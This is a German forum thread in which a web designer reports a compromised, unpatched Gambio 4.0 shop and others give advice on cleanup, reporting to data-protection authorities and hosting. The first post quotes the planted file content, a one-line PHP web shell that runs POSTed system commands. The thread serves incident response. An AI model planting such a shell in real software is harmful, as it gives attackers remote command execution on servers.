Gambio Hack

Thema wurde von ff-webdesigner, 10. Mai 2024 erstellt.

  1. ff-webdesigner

    ff-webdesigner Erfahrener Benutzer

    Registriert seit:
    22. Januar 2014
    Beiträge:
    493
    Danke erhalten:
    41
    Danke vergeben:
    59
    Hallo beisammen,

    ein neuer Kunde hatte als einziges in einem 4.0 Shop den Sicherheitspatch 2024-02 nicht installiert. Heute informierte ihn der Hoster über Viren auf dem Server. Symptomatik:
    • einige kryptisch benannte php Dateien mit folgendem Code im Root:
    • [{"Expires":1,"Discard":false,"Value":"<?php system($_POST['XXXXXXX']);?>","Path":"\/","Name":"XXXXXXX.XXX","Domain":"XXXXX","Secure":false,"Httponly":false,"Max-Age":3}]
    • ab genau dem Erstellungsdatum der ersten Datei einige kryptische Gastkundenaccounts
    Wir haben:
    • kompletten Shop offline gesetzt
    • alle versuchten dateien seit dem ersten hack gelöscht
    • zip aller dateien erstellt, heruntergeladen und mit 3 virenscannern lokal gescanned. keine weiteren treffer
    • sicherheitspatch 2024-02 installiert - war der die ursache? der patch und hack sind leider nirgends dokumentiert
    • alle passwörter serveradmin, ftp, db geändert
    • caches geleert
    • logfiles gelöscht
    • shop wieder online gesetzt
    Der Shop sollte jetzt nach bestem Wissen wieder sauber und sicher sein. Was meint Ihr?

    Generell ist ein Abfluss von Kundendaten möglich wenn solch ein Hack erfolgte?
     
  2. Orange Raven

    Orange Raven Erfahrener Benutzer

    Registriert seit:
    3. April 2013
    Beiträge:
    374
    Danke erhalten:
    146
    Danke vergeben:
    51
    4.0 ist so alt, dass es auch an Dingen gelegen haben kann, die während des normale Updatezyklus geschlossen wurden. Muss nichtmal an Gambio liegen.

    Lokale Virenscanner können was finden, finden aber in den meisten Fällen nichts. Empfehle hier eher den Hoster anzuschreiben und einen entsprechenden Tiefenscan machen zu lassen.

    Ein Shop mit Version 4.0 ist in keinem Fall sicher. 4 Jahre sind Äonen.

    Und natürlich ist ein Abfluss von Kundendaten möglich. Genau dann wenn Zugriff zur Datenbank bestand.

    Leider gibts für Gambio keine WAF von der Stange. Wäre mal ein interessantes Projekt. Einzige Möglichkeit die ich spontan kenne wäre Cloudflare.
     
  3. Walter Lenk

    Walter Lenk Erfahrener Benutzer

    Registriert seit:
    28. September 2011
    Beiträge:
    545
    Danke erhalten:
    236
    Danke vergeben:
    88
    Guten Morgen zusammen,

    Du schreibst:

    Wir habt ihr diese Dateien identifiziert? Wie habt ihr festgestellt ob es nicht zusätzliche neu angelegte Dateien gab? Wurde das per Dateivergleich gelöst?

    Wenn die Annahme stimmt dass der fehlende Security-Patch die Ursache war könntet ihr Glück haben. Wenn es aber unentdeckte Lücken in der veralteten Shopversion gibt wird es evtl. erneut zu Problemen kommen.

    Nicht vergessen:
    Bei der Datenschutzbehörde melden und Kunden verständigen!

    Grüße
    Walter
     
  4. ff-webdesigner

    ff-webdesigner Erfahrener Benutzer

    Registriert seit:
    22. Januar 2014
    Beiträge:
    493
    Danke erhalten:
    41
    Danke vergeben:
    59
    wir haben alles runtergeladen. lokal mit 3 scannern gecheckt. auf server alle dateien mit änderungsdatum ab x gecheckt. alle wenigen betroffenen dateien gesäuert. provider liess einen weiteren virencheck drüber laufen. alles sauber.

    kundendaten haben wir in dem shop eh keine, dient rein info.

    das einzige was mich interessieren würde: sec patch 2024 dichtet dann wohl sehr sicher eine lücke ab die via gastkonten > rechteausweitung stattfindet? wir hattene einige kryptische gäste drin.
     
  5. Walter Lenk

    Walter Lenk Erfahrener Benutzer

    Registriert seit:
    28. September 2011
    Beiträge:
    545
    Danke erhalten:
    236
    Danke vergeben:
    88
    Hallo,

    danke für Deine Erklärung. Ich denke so besteht schon mal eine gute Gewissheit das alles erwischt wurde. Ich persönlich würde zusätzlich einen Dateivergleich mit einer sauberen Version machen.

    Grüße
    Walter
     
  6. davide_giuri

    davide_giuri Neues Mitglied

    Registriert seit:
    17. Mai 2024
    Beiträge:
    1
    Danke erhalten:
    0
  7. Developer

    Developer Erfahrener Benutzer

    Registriert seit:
    7. November 2012
    Beiträge:
    2.936
    Danke erhalten:
    626
    Danke vergeben:
    114
    Darf ich mal fragen, bei welchem Hoster die Kunden liegen?

    Viele Grüße
     
  8. ff-webdesigner

    ff-webdesigner Erfahrener Benutzer

    Registriert seit:
    22. Januar 2014
    Beiträge:
    493
    Danke erhalten:
    41
    Danke vergeben:
    59
  9. Dennis (MotivMonster.de)

    Dennis (MotivMonster.de) G-WARD 2013/14/15/16

    Registriert seit:
    22. September 2011
    Beiträge:
    31.125
    Danke erhalten:
    6.169
    Danke vergeben:
    1.090
    Beruf:
    Mann für alles :)
    Ort:
    Weilburg
    Kundensupport bei denen ist selbst mitten in der Nacht binnen Stunden und meistens weit über reine Serverseitige Dinge hinaus.
     
  10. Schwabenladen - www.schwabenladen.com

    Registriert seit:
    11. April 2012
    Beiträge:
    32
    Danke erhalten:
    2
    Danke vergeben:
    19
    Ich bin schon seit Jahrzehnten bei Hosteurope und hatt nie Probleme - bis auf 2014 - da hatte ich mehrere Hackerangriffe aus Ägypten und der Türkei - aber bei denen ist auch 24 Stunden ein fachkundiger am Telefon - selbst für Anfänger wie mich...
     
  11. Anonymous

    Anonymous Erfahrener Benutzer

    Registriert seit:
    31. März 2020
    Beiträge:
    166
    Danke erhalten:
    58
    Danke vergeben:
    210
    seit jahrzehnten und dann ein anfänger? hm... das passt für mich irgendwie nicht.
     
  12. Schwabenladen - www.schwabenladen.com

    Registriert seit:
    11. April 2012
    Beiträge:
    32
    Danke erhalten:
    2
    Danke vergeben:
    19
    Bin froh, wenn das Glompp läuft und nicht wieder irgendeind Hacker meint sich im Schwabenladen austoben zu müssen.

    Komm da oft nur mit Hilfe bei Host Europe weiter - aber die checken das richtig und können das vor allem auch richtig verständlich und nachvollziehbar erklären - nicht wie oft schon bei Gamio erlebt, daß man mit Standardantworten oder Fachchinesisch wieder wie der Ochs vor der Apotheke steht.
    Egal um welche Uhrzeit - auch nachts hatte ich schon einen längeren "Nachhilfekurs" mit HostEurope...